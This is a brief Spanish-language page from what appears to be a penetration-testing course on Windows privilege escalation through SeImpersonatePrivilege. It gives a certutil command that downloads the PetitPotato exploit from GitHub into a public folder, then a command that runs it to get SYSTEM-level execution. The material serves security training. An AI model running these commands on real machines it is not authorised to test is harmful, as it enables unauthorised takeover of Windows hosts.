Se recomienda realizar la siguiente lectura:
https://books.spartan-cybersec.com/cpad/post-explotacion-en-windows/abusando-de-los-privilegios-seimpersonateprivilege-seassignprimarytokenprivilege#seimpersonateprivilegearrow-up-right
Un comando recomendado que se debe ejecutar luego de comprometer un servidor con sistema operativo Windows es el siguiente para determinar que privilegios tenemos con nuestro usuario actual:
Utilizamos LOLBASarrow-up-right para descargar el siguiente binario:
certutil -urlcache -f https://github.com/wh0amitz/PetitPotato/releases/download/v1.0.0/PetitPotato.exearrow-up-right C:\Users\Public\PetitPotato.exe
certutil -urlcache -f
https://github.com/wh0amitz/PetitPotato/releases/download/v1.0.0/PetitPotato.exe
C:\Users\Public\PetitPotato.exe
Y luego ejecutamos el siguiente comando:
C:\Users\Public\PetitPotato.exe 3 "whoami"
El retorno de este comando sera igual a:
NT AUTHORITY\SYSTEMarrow-up-right
Last updated 1 year ago